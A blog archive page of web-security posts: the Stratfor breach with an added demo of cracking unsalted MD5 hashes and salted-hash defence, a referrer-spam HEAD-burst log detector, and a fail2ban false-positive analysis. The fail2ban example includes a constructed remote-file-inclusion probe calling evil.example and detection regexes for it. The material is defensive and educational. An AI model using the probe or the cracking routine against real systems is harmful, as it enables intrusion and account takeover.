Autarchy of the Private Cave

Tiny bits of bioinformatics, [web-]programming etc

    Archive for the 'Web' Category

    Anything web-related. Just anything.

    Megahack of Stratfor

    9th January 2012

    If you haven’t heard yet – stratfor.com was hacked in December 2011, leaking full details of about 75k credit cards (including owners’ addresses and CVV codes) and 860k (yes, almost a million) user accounts. All Stratfor email archives were also reportedly stolen (around 160-200 GB of data), but those were not made publicly available on the internet – unlike the credit card and user account data, which is still relatively easy to find and download.

    I do not really recollect anything that large. Well, not counting dropbox’s 4-hour window of “any password fits all accounts”, but that was different.

    Here are some of the news items about this seriously large hacking incident:

    Here come more technical reports:

    TheTechGerald’s analysis linked to above got my attention. Unfortunately, a while ago I had subscribed to Stratfor’s “free intelligence mailing list”, and was wondering whether my account information was now publicly available. I was most worried about the password I had used to subscribe, because of the risk that the same password was in use somewhere else.

    Unlike TheTechGerald, I did not use any dictionaries – just the default configuration of a well-known tool for finding weak passwords. (Strictly speaking the hashes are not “decrypted”: the tool guesses candidate passwords, hashes each one and compares it with the leaked hashes.) Within a single hour, ~100k passwords were cracked (~12% of all). By the end of the day, ~50k more had been cracked (17.4% of the 860k in total). At that point my password was still uncracked, and I had found a way to verify that it was not used anywhere else, so I aborted the run.

    There are a few simple conclusions:

    • anybody who had a Stratfor account must verify that he/she is not using that password anywhere else, because if one PC can crack 17% of the hashes in less than a day, it is only a matter of time until all the leaked passwords are cracked and published in the various “md5 decryption databases” (lookup tables of precomputed hashes)
    • system owners should run periodic screenings for weak passwords (and enforce policies that prevent obviously weak passwords from being created in the first place)
    • MD5 is very fast to brute-force, and a fast unsalted hash lets one hash computation per candidate be compared against every account at once. A deliberately slow, per-user salted password hash (bcrypt, scrypt or PBKDF2) makes each guess orders of magnitude more expensive and forces the attacker to work one account at a time; a “more complex” or closed-source hashing library does not help, since the attacker holds the hashes and can reverse-engineer the library at leisure
    • single-factor (password-only) authentication is likely to be replaced by two-factor authentication in the near future
    • one may enjoy increased personal data safety by using throw-away passwords in conjunction with anti-spam mailboxes such as spam.la and mailinator.com (at least 1600 users – 0.186% – did use these services).
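    The post does not show the cracking run itself (it used a well-known tool with default settings), so the following is an added example, not the author’s code or tool. It shows in miniature why an unsalted MD5 dump falls so quickly – one lookup table built from a word list plus a few mangling rules covers every account at once – how to check whether your own password is in the dump, and what a salted, deliberately slow hash (PBKDF2-HMAC-SHA256 here; bcrypt or scrypt would serve the same purpose) changes. The “leaked” hashes, user names and word list are constructed for illustration.

```python
"""Added example, not from the original post: cracking an unsalted MD5 dump
with a word list and simple mangling rules, and the slow salted hash that
would have made the same dump far more expensive to attack.

Everything here is constructed: the 'leaked' hashes come from made-up
passwords and the word list is tiny. A real run uses a large dictionary and
many more rules; the point is the shape of the attack and of the defence."""
import hashlib
import hmac
import os

# Constructed stand-in for a breach dump: username -> unsalted hex MD5.
_SAMPLE_PASSWORDS = {
    "alice": "password",
    "bob": "stratfor1",
    "carol": "Letmein!",
    "dave": "qwerty2011",
    "erin": "correct horse battery staple",   # long passphrase, survives the run
}
LEAKED = {u: hashlib.md5(p.encode()).hexdigest() for u, p in _SAMPLE_PASSWORDS.items()}

# Constructed word list standing in for a dictionary file.
WORDLIST = ["password", "letmein", "qwerty", "stratfor", "welcome", "123456"]


def mangle(word):
    """Rules of the kind a default cracking config applies: case variants
    plus common digit/punctuation/year suffixes."""
    for base in {word, word.capitalize(), word.upper()}:
        for suffix in ("", "1", "!", "2011", "123"):
            yield base + suffix


def crack_md5(hashes, wordlist):
    """Return {username: password} for every hash found.

    Because the hashes are unsalted, each candidate is hashed ONCE and the
    resulting table is consulted for every user; cost does not grow with
    the number of accounts, which is why a dump of 860k falls so fast."""
    table = {}
    for word in wordlist:
        for candidate in mangle(word):
            table[hashlib.md5(candidate.encode()).hexdigest()] = candidate
    return {user: table[h] for user, h in hashes.items() if h in table}


def hash_in_dump(my_password, hashes):
    """The question the post asks: is my password in the leak? With unsalted
    MD5 the check is a single hash and a membership test."""
    return hashlib.md5(my_password.encode()).hexdigest() in hashes.values()


# --- the defence: per-user random salt and a deliberately slow derivation.
# Each guess now costs ITERATIONS HMAC rounds instead of one MD5, and the
# salt means the work must be repeated separately for every account.
ITERATIONS = 100_000


def hash_password(password):
    """Return a self-describing record 'pbkdf2_sha256$iters$salt$hash'."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt/iterations; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    cracked = crack_md5(LEAKED, WORDLIST)
    print(f"cracked {len(cracked)}/{len(LEAKED)}: {cracked}")
    print("'password' in dump:", hash_in_dump("password", LEAKED))
    record = hash_password("Letmein!")
    print("slow hash verifies:", verify_password("Letmein!", record))
```

Running this cracks four of the five constructed accounts with a six-word list; only the long passphrase survives. The same screening loop, run against your own user table with a real dictionary, is the periodic weak-password check recommended above.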

    Read the rest of this entry »


    Posted in Links, Misc, Security, Software, Web | No Comments »

    Light web-based collaborative project management tools

    10th January 2011

    Updated on the 5th of March, 2010 (added Flowdock and Pivotal Tracker, and also personal experience with a few of the previously described tools).

    Back in 2007 I wrote a brief review of web-based project management tools. After that, I started using dotProject for personal projects management. I’m still using it, but for collaborative project management, communication, and tasks/milestones tracking dotProject isn’t perfect.

    I need a tool which is

    • collaborative
    • web-based (to allow effective collaboration)
    • preferably free
    • has a concise per-project activity log
    • has the minimal required functionality: tasks, milestones, files, and status updates.

    After trying a few things, our small team settled for now on using github + pivotaltracker jira + confluence + flowdock.

    Here’s the full list of tools briefly reviewed. I have already been using ProjectPier, so I’ll start with it.
    Read the rest of this entry »


    Posted in Links, Software, Web | 11 Comments »

    Blatant dewlance.com SEO, thrustvps, and HEAD attacks

    6th November 2010

    Update 4: there are claims that these HEAD attacks came from a malicious dewlance.com customer and have nothing to do with dewlance itself.

    Noticing weird narrow spikes in server load graph, I decided to investigate the most recent one – at 03:50 GMT+2 on Nov. 6, 2010.

    The cause was simple: someone issued a few hundred HEAD requests over a 30-second period to a PHP-based web application.

    All the requests came from IP 109.169.59.139, which belongs to the IP range of thrustvps.com (RIPE whois):

    inetnum: 109.169.58.0 – 109.169.59.255
    netname: ThrustVPS_1
    descr: Thrust::VPS
    country: US
    admin-c: RF5058-RIPE
    tech-c: RF5058-RIPE
    status: ASSIGNED PA
    mnt-by: RAPIDSWITCH-MNT

    However, the referrer string is more interesting: all of those requests, decorated with varying User-Agents (and even operating systems), carried one and the same referrer – www.dewlance.com.

    Initially I thought this was a test of a new DoS attack: really, who would issue dozens of HEAD requests to the same page within a few seconds? After seeing that referrer string, however, I now think this is cheap, blatant, poor and ugly SEO performed by dewlance, better known as referrer spam. It relies on some sites displaying a box of ‘recent visitors’, sometimes including the referrer URL as the “page where this visitor came from”; that would give dewlance.com some free link-love. Or maybe dewlance.com expects administrators to investigate log files, notice that referrer string, and happily order some services from dewlance? No way :)

    I’ll file a complaint with thrustvps if I see that kind of misbehaviour again. All that started on Nov. 4, so there’s still hope people behind this dumb SEO implementation will get fired.
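    The load spikes were found by eye; as an added example (not the post’s own tooling), here is the check a practitioner would script over the Apache access log: group HEAD requests per source IP, find the densest 30-second window, and flag the signature described above, many different User-Agents but a single constant Referer. The log lines are constructed to match the post’s description; only the source IP and the referrer are taken from the post, while timestamps, paths and User-Agents are made up, and the threshold is set low so the tiny sample trips it.

```python
"""Added example, not from the original post: detecting a burst of HEAD
requests with a constant Referer in an Apache combined-format access log.

Sample lines are constructed; on a real log raise `threshold` to something
like 50 requests per 30 s."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" LogFormat:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed log excerpt (IP and Referer as described in the post).
SAMPLE_LOG = """\
109.169.59.139 - - [06/Nov/2010:03:50:01 +0200] "HEAD /index.php HTTP/1.1" 200 - "http://www.dewlance.com/" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
109.169.59.139 - - [06/Nov/2010:03:50:03 +0200] "HEAD /index.php HTTP/1.1" 200 - "http://www.dewlance.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6) Safari/533.16"
109.169.59.139 - - [06/Nov/2010:03:50:05 +0200] "HEAD /index.php HTTP/1.1" 200 - "http://www.dewlance.com/" "Opera/9.80 (X11; Linux i686) Presto/2.6.30"
192.0.2.10 - - [06/Nov/2010:03:50:07 +0200] "GET /index.php HTTP/1.1" 200 15234 "http://www.google.com/search?q=dotproject" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"
109.169.59.139 - - [06/Nov/2010:03:50:08 +0200] "HEAD /index.php HTTP/1.1" 200 - "http://www.dewlance.com/" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
192.0.2.10 - - [06/Nov/2010:03:50:09 +0200] "GET /style.css HTTP/1.1" 200 2310 "http://example.org/index.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"
109.169.59.139 - - [06/Nov/2010:03:50:12 +0200] "HEAD /index.php HTTP/1.1" 200 - "http://www.dewlance.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
109.169.59.139 - - [06/Nov/2010:03:50:19 +0200] "HEAD /index.php HTTP/1.1" 200 - "http://www.dewlance.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6) Safari/533.16"
198.51.100.7 - - [06/Nov/2010:03:50:30 +0200] "HEAD / HTTP/1.0" 200 - "-" "uptime-probe/1.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_head_bursts(lines, window=timedelta(seconds=30), threshold=5):
    """Report, per source IP, the densest `window` of HEAD requests if it
    holds at least `threshold` of them. 'referer_spam' marks the pattern
    from the post: several User-Agents, one unchanging Referer."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "HEAD":
            by_ip[rec["ip"]].append(rec)

    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best_count, best_start, best_end = 0, 0, 0
        start = 0
        for end, rec in enumerate(recs):          # sliding window over sorted times
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 > best_count:
                best_count, best_start, best_end = end - start + 1, start, end
        if best_count < threshold:
            continue
        burst = recs[best_start:best_end + 1]
        referers = {r["referer"] for r in burst}
        agents = {r["ua"] for r in burst}
        findings.append({
            "ip": ip,
            "count": best_count,
            "first": burst[0]["ts"].isoformat(),
            "paths": sorted({r["path"] for r in burst}),
            "referers": sorted(referers),
            "distinct_user_agents": len(agents),
            "referer_spam": len(referers) == 1 and len(agents) > 1,
        })
    return findings


if __name__ == "__main__":
    for finding in find_head_bursts(SAMPLE_LOG.splitlines()):
        print(finding)
```

On the sample this reports one burst: six HEAD requests from 109.169.59.139 within 18 seconds, four distinct User-Agents, one Referer. The uptime probe, a lone HEAD from another address, stays below the threshold, which is the main thing a rule like this must get right before it feeds a firewall.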

    Update 1: they have been doing this every 4 hours since November 4, 2010 (Thursday). Each burst pushes the load up to 22, with ~50 Apache processes competing for a few CPU cores:
    Read the rest of this entry »


    Posted in Misc, Web | 8 Comments »

    ask.debian.net: stackoverflow for Debian with Shapado

    19th October 2010

    ask.debian.net is a StackOverflow-like Q&A website built with Shapado, an open-source Q&A engine.

    That was my first encounter with Shapado, so it was interesting to read the Shapado authors’ justification and a related question on meta.SO.


    Posted in Links, Misc, Software, Web | No Comments »

    Simple and efficient Drupal upgrades: patch!

    3rd January 2010

    Just a quick note: upgrading Drupal with a patch file is a really efficient and fast method, especially since diff/patch files are available for many Drupal version combinations.


    Posted in Drupal, Links, Notepad, Web | No Comments »

    Does Google attack your servers, too?

    5th December 2009

    Evil?

    For about 2 weeks now I have been alerted every day to suspicious behaviour from some computer/server in Google’s IP range:
    Read the rest of this entry »


    Posted in Misc, Web | No Comments »

    fail2ban and Google translate: how to easily cut your WP blog traffic

    14th November 2009

    fail2ban has a php-url-fopen rule, meant to catch remote-file-inclusion attempts of the form ?param=http://attacker/…

    WordPress has a Global Translator plugin which, among other services, uses Google Translate.

    If someone uses Google Translate (e.g. via Global Translator’s mini language flags) and then follows a link back to your blog, that visitor may get banned by fail2ban (especially if you have set maxretry to 1): the Referer header now contains a translate URL with a u=http://… parameter, which looks exactly like the php-url-fopen attack signature. The bad thing is that you will not realize this until you check one or several translations yourself, because a random site visitor experiencing the problem is highly unlikely to bother reporting it – especially when your blog’s Contact page is also inaccessible to them.

    Clearly, Google Translate is not the only legitimate service which will trigger that rule.

    Solution: the only solution I have found is to add a whitelist regex (fail2ban’s ignoreregex) to the php-url-fopen rule so that lines whose Referer is a Google Translate URL are never counted.
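    The post gives no regexes, so the following is an added example, not the author’s configuration. It replays three constructed access-log lines through a Python emulation of fail2ban’s matching: a genuine remote-file-inclusion probe, a visitor arriving from Google Translate, and an ordinary visitor. The failregex is an assumption modelled on the php-url-fopen filter shipped with fail2ban around 2009 (check the copy in your own filter.d directory), and fail2ban’s <HOST> placeholder is emulated with a simple named group. Besides the whitelist the post describes, the example also shows the alternative fix: anchoring the failregex so the =http:// test cannot run past the request line into the Referer.

```python
"""Added example, not from the original post: why fail2ban's php-url-fopen
rule bans visitors arriving via Google Translate, and two ways to stop it.

Assumptions: FAILREGEX is modelled on the filter.d/php-url-fopen.conf of the
era (verify against your own host); <HOST> is emulated with a plain named
group rather than fail2ban's fuller host pattern; all log lines are
constructed, using reserved documentation addresses."""
import re

HOST = r'(?P<host>\S+)'   # stand-in for fail2ban's <HOST> substitution


def compile_f2b(pattern):
    """Compile a fail2ban-style pattern, replacing <HOST> as fail2ban does."""
    return re.compile(pattern.replace("<HOST>", HOST))


# Assumed shape of the shipped rule. The unanchored `.*` between the request
# line and the final `"` lets the match run into the Referer field.
FAILREGEX = compile_f2b(r'^<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.*\"$')

# Fix 1 (what the post does): whitelist lines whose Referer is Google Translate.
IGNOREREGEX = compile_f2b(
    r'^<HOST> -.*"https?://translate\.google\.[a-z.]+/translate\?[^"]*" "[^"]*"$')

# Fix 2 (alternative): forbid `"` inside the matched request line so the
# `=http://` must sit in the request itself, never in the Referer.
TIGHT_FAILREGEX = compile_f2b(
    r'^<HOST> -.*"(GET|POST) [^"]*\?[^"]*=https?://[^"]*"')

# Constructed Apache combined-format lines.
ATTACK_LINE = ('203.0.113.5 - - [14/Nov/2009:10:00:01 +0200] '
               '"GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 404 211 '
               '"-" "Mozilla/4.0 (compatible; MSIE 6.0)"')
TRANSLATE_LINE = ('198.51.100.23 - - [14/Nov/2009:10:00:05 +0200] '
                  '"GET /?p=42 HTTP/1.1" 200 5123 '
                  '"http://translate.google.com/translate?hl=en&sl=en&tl=de&u=http://blog.example/?p=42" '
                  '"Mozilla/5.0 (X11; Linux x86_64) Firefox/3.5"')
NORMAL_LINE = ('192.0.2.10 - - [14/Nov/2009:10:00:09 +0200] '
               '"GET /?p=42 HTTP/1.1" 200 5123 '
               '"http://www.google.com/search?q=private+cave" '
               '"Mozilla/5.0 (X11; Linux x86_64) Firefox/3.5"')


def f2b_verdict(line, failregex, ignoreregex=None):
    """Return the host fail2ban would count as a failure for `line`, or None.
    A line matching ignoreregex is never counted, whatever failregex says."""
    if ignoreregex is not None and ignoreregex.search(line):
        return None
    m = failregex.search(line)
    return m.group("host") if m else None


def audit(lines, failregex, ignoreregex=None):
    """Verdict per line; point it at a real access log to test a rule change
    before reloading fail2ban."""
    return {line: f2b_verdict(line, failregex, ignoreregex) for line in lines}


if __name__ == "__main__":
    lines = [ATTACK_LINE, TRANSLATE_LINE, NORMAL_LINE]
    print("shipped rule:      ", list(audit(lines, FAILREGEX).values()))
    print("with ignoreregex:  ", list(audit(lines, FAILREGEX, IGNOREREGEX).values()))
    print("tightened failregex:", list(audit(lines, TIGHT_FAILREGEX).values()))
```

With the shipped-style rule both the probe and the Google Translate visitor are counted, which is the false positive the post describes; with either fix only the probe is. The tightened failregex is the more robust of the two, since it does not depend on enumerating every legitimate proxy or translation service that might put =http:// into a Referer.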


    Posted in *nix, Software, Web, WP PlugIns | No Comments »